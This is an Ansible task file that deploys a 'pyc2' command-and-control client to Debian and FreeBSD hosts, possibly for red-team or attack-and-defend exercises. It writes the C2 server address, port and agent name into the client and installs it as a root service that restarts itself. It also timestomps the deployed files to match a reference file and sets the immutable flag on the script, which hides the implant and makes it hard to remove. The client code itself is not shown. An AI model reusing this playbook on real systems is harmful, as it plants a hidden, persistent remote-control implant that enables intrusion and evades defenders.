---
- name: Get reference file stats (Common for Unix/BSD)
  ansible.builtin.stat:
    path: "{{ pyc2_timestomp_ref_unix }}"
  register: unix_ref

#- name: Install Python 3 and pip3 on Debian/Ubuntu
#  ansible.builtin.package:
#    name:
#      - python3
#      - python3-pip
#    state: present
#  when: ansible_os_family == 'Debian'

#- name: Install cryptography using pip
#  ansible.builtin.pip:
#    name: cryptography
#    executable: pip3
#  when: ansible_os_family == 'Debian'

- name: Install Python 3 on FreeBSD
  ansible.builtin.package:
    name:
      - python311-3.11.6
      #- python38
      #- py38
      #- py38-pip
    state: present
  when: ansible_os_family == 'FreeBSD'

- name: Install pip on freebsd
  command: 'python3.11 -m ensurepip'
  when: ansible_os_family == 'FreeBSD'

#- name: Install cryptography using pip on freebsd
#  command: 'python3.11 -m pip install cryptography'
#  when: ansible_os_family == 'FreeBSD'

- name: Ensure destination directory exists debian
  ansible.builtin.file:
    path: "{{ pyc2_client_location_unix | dirname }}"
    state: directory
    owner: root
    group: root
    mode: '0755'
  when: ansible_os_family != 'FreeBSD'

- name: Ensure destination directory exists
  ansible.builtin.file:
    path: "{{ pyc2_client_location_unix | dirname }}"
    state: directory
    owner: root
    mode: '0755'
  when: ansible_os_family == 'FreeBSD'

- name: Copy shell script to target system debian
  copy:
    src: "files/client.py"
    dest: "{{ pyc2_client_location_unix }}"
    owner: root
    group: root
    mode: '0755'
  when: ansible_os_family != 'FreeBSD'

- name: Copy shell script to target system freebsd
  copy:
    src: "files/client.py"
    dest: "{{ pyc2_client_location_unix }}"
    owner: root
    mode: '0755'
  when: ansible_os_family == 'FreeBSD'

# Need to do this as separate tasks
- name: Update TIMEOUT value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^TIMEOUT_TIME=.*'
    replace: 'TIMEOUT_TIME={{ pyc2_timeout_time }}'

- name: Update server IP
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^SERVER=.*'
    replace: 'SERVER={{ pyc2_server }}'

- name: Update server port
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^SERVER_PORT=.*'
    replace: 'SERVER_PORT={{ pyc2_port }}'

- name: Update server port range
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^PORT_RADIUS=.*'
    replace: 'PORT_RADIUS={{ pyc2_port_range }}'

- name: Update firewall name
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^FIREWALL_NAME=.*'
    replace: 'FIREWALL_NAME="{{ pyc2_firewall_name }}"'

- name: Update DEBUG value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^DEBUG=.*'
    replace: 'DEBUG={{ pyc2_debug }}'

- name: Update BUFFER value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^BUFFER_SIZE=.*'
    replace: 'BUFFER_SIZE={{ pyc2_buffer_size }}'

- name: Update AGENT_NAME value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^AGENT_NAME=.*'
    replace: 'AGENT_NAME="{{ pyc2_agent_name }}"'

- name: Remove lines containing 'Fernet' from the configuration file if on freebsd
  ansible.builtin.lineinfile:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '.*Fernet.*'
    state: absent
    backup: yes
  when: ansible_os_family == 'FreeBSD'

- name: Install venv support for Debian
  ansible.builtin.package:
    name: python3-venv
  when: ansible_os_family == "Debian"

- name: Create venv and install requirements
  ansible.builtin.pip:
    requirements: "{{ [pyc2_client_location_unix | dirname, 'requirements.txt'] | path_join }}"
    virtualenv: "{{ [pyc2_client_location_unix | dirname, 'venv'] | path_join }}"
    virtualenv_command: "{{ (ansible_os_family == 'Windows') | ternary('python -m venv', 'python3 -m venv') }}"
    state: present
  vars:
    base_dir: "{{ (ansible_facts.os_family == 'Windows') | ternary('python -m venv --with-pip', 'python3 -m venv --with-pip') }}"

- name: Create systemd service to execute script
  copy:
    dest: "/etc/systemd/system/{{ pyc2_service_name }}.service"
    content: |
      [Unit]
      Description={{ pyc2_service_description }}
      After=network.target

      [Service]
      ExecStart={{ [pyc2_client_location_unix, 'venv//bin/python3'] | path_join }} {{ pyc2_client_location_unix }}
      Restart=always
      RestartSec=60
      User=root

      [Install]
      WantedBy=multi-user.target
  when: ansible_os_family == 'Debian'

- name: Reload systemd to recognize new service
  systemd:
    daemon_reload: yes
  when: ansible_os_family == 'Debian'

- name: Enable and start the new service
  systemd:
    name: "{{ pyc2_service_name }}"
    enabled: yes
    state: started
  when: ansible_os_family == 'Debian'

- name: Create rc.d script for FreeBSD
  ansible.builtin.copy:
    dest: "/etc/rc.d/{{ pyc2_service_name }}"
    content: |
      #!/bin/sh
      #
      # PROVIDE: {{ pyc2_service_name }}
      # REQUIRE: NETWORKING
      # KEYWORD: shutdown
      #
      # Add the following lines to /etc/rc.conf to enable this service:
      # {{ pyc2_service_name }}_enable="YES"

      . /etc/rc.subr

      name="{{ pyc2_service_name }}"
      rcvar="{{ pyc2_service_name }}_enable"

      command="/usr/local/bin/python3.11"
      command_args="{{ pyc2_client_location_unix }}"

      load_rc_config $name
      run_rc_command "$1"
    mode: '0755'
  when: ansible_os_family == 'FreeBSD'

- name: Enable {{ pyc2_service_name }} service in rc.conf
  community.general.sysrc:
    name: "{{ pyc2_service_name }}_enable"
    value: "YES"
  when: ansible_os_family == 'FreeBSD'

- name: Pause for 10 seconds for freebsd service
  ansible.builtin.pause:
    seconds: 10
  when: ansible_os_family == 'FreeBSD'

- name: Start service manually on freebsd
  command: 'service {{ pyc2_service_name }} start'
  when: ansible_os_family == 'FreeBSD'

# not working
#- name: Start {{ pyc2_service_name }} service
#  ansible.builtin.service:
#    name: "{{ pyc2_service_name }}"
#    state: started
#  when: ansible_os_family == 'FreeBSD'

#- name: Enable and start service on FreeBSD
#  ansible.builtin.service:
#    name: "{{ pyc2_service_name }}"
#    enabled: yes
#    state: started
#  when: ansible_os_family == 'FreeBSD'

#- name: Timestomp the systemd service file debian
#  command: touch -r /bin/sh /etc/systemd/system/{{ pyc2_service_name }}.service
#  when: ansible_os_family == 'Debian'
#
#- name: Timestomp the systemd service file freebsd
#  command: touch -r /bin/sh /usr/local/etc/rc.d/{{ pyc2_service_name }}
#  when: ansible_os_family == 'FreeBSD'
#
#- name: Timestomp script to match /bin/sh creation time
#  command: touch -r /bin/sh {{ pyc2_client_location_unix }}

- name: Apply Timestomp to all deployed files
  ansible.builtin.file:
    path: "{{ item }}"
    state: file
    modification_time: "{{ unix_ref.stat.mtime | string | split('.') | first }}"
    access_time: "{{ unix_ref.stat.atime | string | split('.') | first }}"
  loop:
    - "{{ pyc2_client_location_unix }}"
    - "{{ (ansible_os_family == 'Debian') | ternary('/etc/systemd/system/' + pyc2_service_name + '.service', '/usr/local/etc/rc.d/' + pyc2_service_name) }}"

- name: Set immutable attribute on script
  command: "chattr +i {{ pyc2_client_location_unix }}"
  when: ansible_os_family != 'FreeBSD'